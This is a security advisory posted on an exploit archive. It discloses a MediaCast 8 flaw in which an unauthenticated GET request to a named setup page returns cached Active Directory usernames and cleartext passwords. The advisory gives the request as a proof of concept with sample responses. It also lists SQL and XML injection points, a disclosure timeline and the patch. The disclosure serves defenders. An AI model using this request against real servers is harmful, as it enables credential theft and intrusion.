exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MediaCast 8 Credential Disclosure

MediaCast 8 Credential Disclosure
Posted Apr 25, 2011
Authored by Daniel Clemens

MediaCast versions 8 and below suffer from a vulnerability that allows for the disclosure of previously cached Active Directory credentials.

tags | exploit
SHA-256 | c88fa381d0da7f60a5a8607c0a502f70e3ca22558705e751c96e78bcd92f858a

MediaCast 8 Credential Disclosure

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Packetninjas L.L.C
www.packetninjas.net

-= Security Advisory =-

Advisory: MediaCast Password Dump Vulnerability

Release Date: 04/25/2011

Author: Daniel Clemens [daniel.clemens[at]packetninjas.net]

Application: MediaCast <= 8 (By Inventive, Inc) - http://www.InventiveTec.com
Description:

Vulnerabilities exist within the MediaCast application have been discovered that allow
an unauthenticated user to force the application to return critical values (Username
and Password Information) to the end user within verbose error messages.

By sending a GET request to /authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1
( or /authenticate_ad_setup_finished.cfm?UserID=<ID> )
usernames and passwords of previously cached Active Directory
credentials would be displayed as well as specific application level user name and
password information (which at times could differ from AD credentials if the
credentials have been updated within Active Directory and the user hasn't logged into
the web application with new credentials).

The impact of this vulnerability is that an attacker has the ability to enumerate sequential
usernames as well as the clear text passwords associated with users within the application
and Active Directory Domain.

Further review of the root cause of this vulnerability was not performed during the analysis
of this vulnerability since these issues were discovered during a remote penetration test
of a network in contrast to a dedicated application review.

Besides obvious correlation between verbose error message output and
incorrect or non-existant exception handlers, it appears that this vulnerability
exists due because the following conditions met:
* Incorrect Session Handling and Implementation (on /authenticate_ad_setup_finished.cfm)
* Incorrect Logic implementation
* Clear Text Storage of password information
* Active ldap integration with existing Active Directory Domain
* Possibly a problem with the cold fusion dll that is aiding in the AD integration....


Risk: Critical
Vendor Status: Patch Available

http://www.packetninjas.net/storage/advisories/MediaCast-PWDump-FINAL.txt

Misc Notes:

About MediaCast:
"MediaCAST combines a Web-enabled learning management system with the tools to create,
manage, and deliver live and on-demand IP multimedia anytime, anywhere. It is feature-rich,
easy-to-use and efficient platform for creating and managing multimedia content and delivering
online learning programs"



Proof of Concept:

Sequential GET Request:
/authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1
/authenticate_ad_setup_finished.cfm?UserID=<ID>

Request:
/authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1

Response:
Programs,Courses,Sections,Resources
IP_Address x.x.x.x
IsAdmin 0
IsGeneric 0
IsInstructor 1
IsManager 0
IsTrainingManager 0
OrganizationID 20
Password mycrazycleartextpassword!
SetTopMode 0
SystemID 20
SystemType MediaCAST
UploadMethod 1 UserID 31337
Username craig.mckenna
VersionNumber 8
WebCT 0
cfid 490595
cftoken 4CA9DA0E-956B-4A61-A6F3DB4FFCC98BDA
email [null] emailAddress [null]
sessionid INVENTIVE_490595_4CA9DA0E-956B-4A61-A6F3DB4FFCC98BDA
urltoken CFID=490595&CFTOKEN=4CA9DA0E-956B-4A61-A6F3DB4FFCC98BD


Request:
GET /authenticate_ad_setup_finished.cfm?UserID=<ID>

Example Response:
<td class='cfdump_td_query'>1</td>
<td class='cfdump_td_value'>1069</td>
<td class='cfdump_td_value'>abc</td>
<td class='cfdump_td_value'>abcpass123</td>
<td class='cfdump_td_value'>2009-12-07 09:12:30.000</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>1</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>0</td>
<td class='cfdump_td_value'>company name</td>
<td class='cfdump_td_value'>[empty string]</td>



Disclosure Timeline:
July 21, 2010 - Initial Contact with client using MediaCAST which enabled remote root of network
during remote penetration test.
August 11, 2010 - Email contact as well as phone calls placed to vendor
August x, 2010 - Multiple calls to developers, support etc.
August 24, 2010 - Vendor Response
"You are correct that the system was displaying verbose error messages that contained
information that could be used in a nefarious way.
I have turned off the display of this extended debugging information.
I have also addressed the issue with the /authenticate_ad_setup_finished.cfm URL
such that it traps the problematic condition and redirects the user to the login page."

Recommendation:
- Patch to the most current version of MediaCast, or patch current MediaCast application.



CVE Information: CVE-2010-0216

Misc. Items that should be patched with patched deployed by MediaCast:
1) Default Blue Dragon Administrative Interface exposed to the Internet in default installations.
This should really be bound to localhost:10000
- Misc xss vulns were present in this piece of software.
2) XML Injection - /inventivex/mangetraining/ CP_RIGHTSOURCE , bdclient_Inventive Cookie
3) SQL Injection through /authenticate_ad_setup_finished.cfm
4) SQL Injection MediaCast SQL Injection /inventivex/managetraining [ CP_ENLARGESTYLE cookie ] injection
5) Mediacast Application Information Leakage URI: /inventivex/isptools/release/metadata/globalIncludeFolders.txt
-- snip --
globalExcludeFolders.txt
Public\inventivex\isptools\release\archive\*
Public\inventivex\isptools\release\metadata\*
Public\*.zip
Public\Copy of*
Public\Backup of*
Public\rsync\rsync_log\*.txt
Public\images.zip
Public\mysql_odbc.msi
-- snip --

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850 | | o. 866.267.8851
"Moments of sorrow are moments of sobriety"
-----BEGIN PGP SIGNATURE-----

iD8DBQFNtE3blZy1vkUrR4MRAmTDAJ4gUgUpOen7gc50eQxl1/pG9QHi1QCdFixs
adarnuyShSYjBWVw2SlmbRE=
=Ip9H
-----END PGP SIGNATURE-----








Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close